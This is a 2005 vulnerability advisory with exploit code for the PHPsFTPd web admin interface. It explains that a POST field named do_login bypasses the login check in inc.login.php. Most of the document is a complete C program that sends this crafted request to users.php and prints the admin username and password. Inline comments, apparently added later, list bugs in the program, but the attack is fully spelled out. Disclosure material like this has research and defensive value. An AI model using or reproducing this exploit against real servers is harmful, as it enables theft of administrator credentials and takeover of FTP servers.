
phpsftpd.txt

🗓️ 14 Jul 2005 00:00:00Reported by Stefan LochbihlerType 

A PHPsFTPd admin password leak vulnerability in versions 0.2 to 0.4 allows a specially crafted POST request to user.php to obtain the admin credentials.

Code
`Author: Stefan Lochbihler  
Date: 11. Juli 2005  
Affected Software: PHPsFTPd  
Software Version: 0.2 -> 0.4  
Software URL: http://phpsftpd.sourceforge.net/  
Attack: Admin password leak  
  
  
about PHPsFTPd:  
PHPsFTPd is a web-based administration and configuration interface  
for the SLimFTPd ftp server. It can be used on any http server that  
supports PHP and does not need a database or additional php modules,  
only SlimFTPD. It allows the administrators of the ftp server to  
configure it from within this interface as opposed to its native  
ascii conf. file. It shows statistics about the users that accessed  
the server, the files that were downloaded, server breakdowns etc.  
  
  
Hi there again  
  
during a look at the code of the PHPsFTPd project I found out that it  
is possible to get the admin's username & password. This happens  
when we send a specially crafted POST request to the user.php script.  
The reason for the leak is in the inc.login.php script.  
When you take a look at the code below you see that the code will exit  
if there is no logged session or we don't try to logout.  
But when we POST the do_login var with some stuff in it, execution goes on.  
  
  
snipped from inc.login.php  
  
  
//login form  
// Gate: the login form is printed and execution stops only when all three
// conditions hold -- no logged session, no logout request, and no do_login
// POST field. A request that merely carries a do_login field therefore gets
// past this gate without any session; presumably do_login was meant to be
// handled after a credential check, so the session test alone should decide
// whether execution continues (verify against the rest of the login flow).
if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) &&  
!isset($_POST['do_login'])) {  
echo "<p>&nbsp;</p>  
<form action='index.php' method='post'>  
<img src=gfx/ico_notice.gif align=absmiddle> Please login with admin  
pass<br>  
<input class=td type='password' name='pass'>  
<input class=button type='submit' name='login' value='Login'>  
</form>  
";  
die;  
}  
  
  
  
  
  
exploit:  
Prints the admin's username & password  
  
  
  
// PHPsFTPd Admin Password Leak  
// tested on a WinXP SP1 box  
  
  
  
#include "stdafx.h"
#include "stdio.h"
#include "winsock2.h"
#include <stdlib.h>
#include <string.h>

#pragma comment (lib,"ws2_32")
  
#define PORT 80              /* TCP port the request is sent to */
#define rootdir "/phpsftpd/" /* URL path prefix of the PHPsFTPd install */


typedef unsigned long ulong; /* 32 bits on the Win32 build this listing targets; 64 bits on LP64 platforms */


void usage(char *);          /* prints the usage line and exits */
ulong checkhost(char *);     /* resolves a dotted quad or host name to an IPv4 address; exits on failure */
  
  
  
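/*
 * Resolve a host given as a dotted quad or a DNS name to an IPv4 address.
 *
 * host: NUL-terminated dotted-quad string or host name.
 * Returns the address in network byte order (a 32-bit value; the upper
 * bits of the ulong are zero where ulong is 64 bits wide).
 * Exits with status 1 when the name cannot be resolved or does not resolve
 * to an IPv4 address; the caller never sees an error return, which keeps
 * the original contract.
 */
ulong checkhost(char *host)
{
    ulong host_ip = 0;
    struct in_addr in4;

    /* Fast path: a literal dotted quad. inet_addr() reports a parse failure
     * as INADDR_NONE, which is also the valid address 255.255.255.255 --
     * that ambiguity is inherent to inet_addr() and inherited here. */
    host_ip = inet_addr(host);
    if (host_ip != INADDR_NONE) {
        return host_ip;
    }

    struct hostent *hp = gethostbyname(host);
    /* Also reject results that are not a 4-byte IPv4 address: the original
     * read sizeof(ulong) bytes straight out of h_addr through a cast, which
     * is an aliasing violation and an over-read wherever ulong is 64 bits. */
    if (!hp || hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof in4
        || !hp->h_addr_list || !hp->h_addr_list[0]) {
        printf("unable to resolv host...\n");
        exit(1);
    }

    /* Copy exactly the four address bytes; no alignment or aliasing issue. */
    memcpy(&in4, hp->h_addr_list[0], sizeof in4);
    host_ip = in4.s_addr;

    return host_ip;
}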
  
  
/* Print the one-line usage banner for program name progn and terminate
 * with exit status 0 (never returns to the caller). */
void usage (char *progn){
    fprintf(stdout, "Usage[%s]: www.targethost.com\n", progn);
    exit(0);
}
  
  
  
  
/*
 * Entry point of the proof of concept.
 *
 * argv[1] is the target host name or IPv4 address. The program resolves it,
 * opens a TCP connection to port PORT, hand-builds a single HTTP POST to
 * rootdir "users.php?action=edit&username=root" with the body
 * "do_login=true", reads the reply with two recv() calls, and prints the
 * text following the first two "value=" attributes of the second chunk as
 * the admin username and password.
 *
 * Server-side cause (from the advisory text above): the login gate in
 * inc.login.php is skipped whenever a do_login POST field is present, with
 * or without a logged session, so the edit form is served to an
 * unauthenticated request. The fix belongs on the server side; presumably
 * the gate should depend on the session alone.
 *
 * Returns 0 on the success path; every error path calls exit() instead.
 * Defects in this listing are flagged inline: unchecked connect() and
 * recv() results, a possible NULL from strstr(), and value loops that can
 * run past the buffer. They make the tool unreliable, not the server.
 */
int main(int argc, char* argv[])
{

WSADATA wsa;
SOCKET client;
WORD wsVersion;

char httpRequest[1024]; /* request text, built in place and bounded by sizeof below */
char recvBuffer[1024];  /* reply chunk; one byte is always reserved for the NUL */

char *p; /* cursor into recvBuffer while the two values are extracted */

struct sockaddr_in addr; /* NOTE(review): never zeroed; only three fields are assigned below */
int err=0,recvSize=0;

printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:[email protected]\n");

if(argc<2)
usage(argv[0]); /* usage() exits, so argv[1] is valid from here on */


wsVersion=MAKEWORD(2,0);

/* Assignment inside the condition is deliberate: WSAStartup returns
 * non-zero on failure. Note that the failure exit status is 0, which a
 * caller cannot distinguish from success. */
if(err=WSAStartup(wsVersion,&wsa)){
printf("Error: WSAStartup\n");
exit(0);
}


client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(client==INVALID_SOCKET){
printf("Error: Create Socket\n");
exit(0); /* exits without the matching WSACleanup() */
}


addr.sin_addr.s_addr = checkhost(argv[1]); /* checkhost() exits on resolution failure */
addr.sin_port = htons(PORT);
addr.sin_family = AF_INET;


/* Every strncat below is bounded by the space left in httpRequest, so the
 * buffer cannot overflow; an over-long request would only be silently
 * truncated (the text built here is far shorter than 1024 bytes). */
memset(httpRequest,'\0',sizeof(httpRequest));

strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
/* NOTE: the next five string literals appear wrapped over two lines by the
 * mail formatting of this listing. A C string literal cannot span lines
 * that way, so each one must sit on a single line to compile. */
strncat(httpRequest,"users.php?action=edit&username=root
HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT
MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
/* The Host: header is a fixed placeholder rather than argv[1]. */
strncat(httpRequest,"Host:
www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"Content-Type:
application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
/* 13 is strlen("do_login=true"); the "\r\n" appended to the body below is
 * therefore sent outside the declared Content-Length. */
strncat(httpRequest,"Content-Length:
13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

/* The result is stored in err but never examined: a refused or timed-out
 * connection falls straight through to send() and recv(). */
err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

//Get Http Stuff
send(client,httpRequest,strlen(httpRequest),0); /* return value ignored */
/* recv() returns SOCKET_ERROR (-1) on failure and 0 when the peer closes;
 * neither is checked, so recvBuffer[recvSize] can write recvBuffer[-1].
 * The two calls also assume the response headers arrive in the first
 * segment and the form HTML in the second; TCP gives no such guarantee. */
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';
//Get username & password
recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
recvBuffer[recvSize]='\0';


// breaks when the password itself contains a 0x20 (space)
/* strstr() returns NULL when "value=" is absent -- for instance when the
 * server answers with something other than the edit form -- and p+6 is
 * then dereferenced. The loops stop only at a space, so a value with no
 * following space is read past the NUL terminator and the end of
 * recvBuffer. */
p=strstr(recvBuffer,"value=");
printf("Username:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);

/* The second search starts at the current cursor, i.e. at the next
 * "value=" attribute after the username. */
p=strstr(p,"value=");

printf("\n");
printf("Password:");

for(p=p+6;*p!=0x20;p++)
putc(*p,stdout);


closesocket(client);
WSACleanup();

printf("\n");
return 0;
}
  
  
Vendor Status: The vendor has been informed.  
  
Discovered (c) by Steve  
  
  
  
  
  
--   
Erstellt mit Operas revolutionärem E-Mail-Modul: http://www.opera.com/m2/  
`
